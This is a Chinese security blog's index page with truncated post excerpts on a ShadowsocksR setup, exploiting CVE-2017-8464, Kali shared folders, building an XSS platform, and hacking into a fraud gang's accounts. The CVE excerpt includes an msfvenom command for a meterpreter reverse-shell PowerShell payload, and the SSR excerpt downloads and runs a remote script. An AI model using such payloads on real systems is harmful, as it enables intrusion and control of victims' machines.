News:禁止使用本博客的技术文章、源码、工具等用于非法用途,否则后果自负。

The Lastest

渗透测试

vultr一键搭建SSR

jasonx 18 0

首先是购买服务器服务器我推荐用vultr的,支持支付宝付款。服务器环境地区选美国硅谷吧,日本也可以,不过很容易被墙。新建服务器的时候,选择centos6 x64。安装shadowsocksRwget --no-check-certificate https://freed.ga/github/shadowsocksR.sh; bash shadowsocksR.sh 然后根据提示安装就行了。客户端设置本地的Shadowsocks填...

漏洞研究

CVE-2017-8464 个人利用小姿势

jasonx 25 0

0x00CVE-2017-8464 个人利用小姿势0x01 首先用MSF生成一个payloadmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=端口 -f psh-reflection >shell.ps1生成以后,把shell.ps1放到网站上。0x02 msf设置监听payloaduse exploit/multi/handler set pay...

电脑技术

设置Vmware中Kali的共享文件夹

jasonx 23 0

0x00 首要任务kali_linux_2018.1 安装 Vmware-Tools 创建与 windows 的共享文件夹0x01 设置方法右键虚拟机设置,添加共享文件夹。查看共享目录命令vmware-hgfsclient 新建文件夹mkdir /root/共享/ 挂载共享文件夹/usr/bin/vmhgfs-fuse .host:/ /root/共享 -o subtype=vmhgfs-fuse,allow_other 0x02...

渗透测试

XSS平台搭建方法

jasonx 38 0

前言在很多时候,为了测试xss漏洞,我们需要一个xss平台,如果自己搭建就更安全便捷了,今天我们来介绍下如何自建xss平台。0x00 准备工作首先你需要一个服务器,和运行环境,这个就不用多说了。0x01 开始搭建下载压缩包以后,上传到网站,解压。然后打开config.php文件,修改数据库配置信息,域名信息等等。这里修改成true,开启url重写。$config['urlrewrite'] =true; 修改18行为...

渗透测试

【忍无可忍】揭秘一个专门针对学生家长下手的诈骗团伙

jasonx 35 0

前言在互联网高速发展的今天,很多针对网络诈骗的骗术也在日益更新,虽然都在宣传如何防诈骗,但是不断更新的骗术,始终让人防不胜防。今天我们揭秘的这个骗子充分利用家长对儿女的关爱,然后冒充子女的对这些家长进行诈骗,过程让人看了揪心、愤怒。详情请外下看。0x00 关于控制权关于如何拿下骗子的控制权,非法控制骗子是否违法这里咱们暂不讨论。我的目的很简单,曝光骗子及骗术,让广大网友避免上当受骗曝光骗子的骗术,以及所有涉及到的QQ群(包括骗子暂...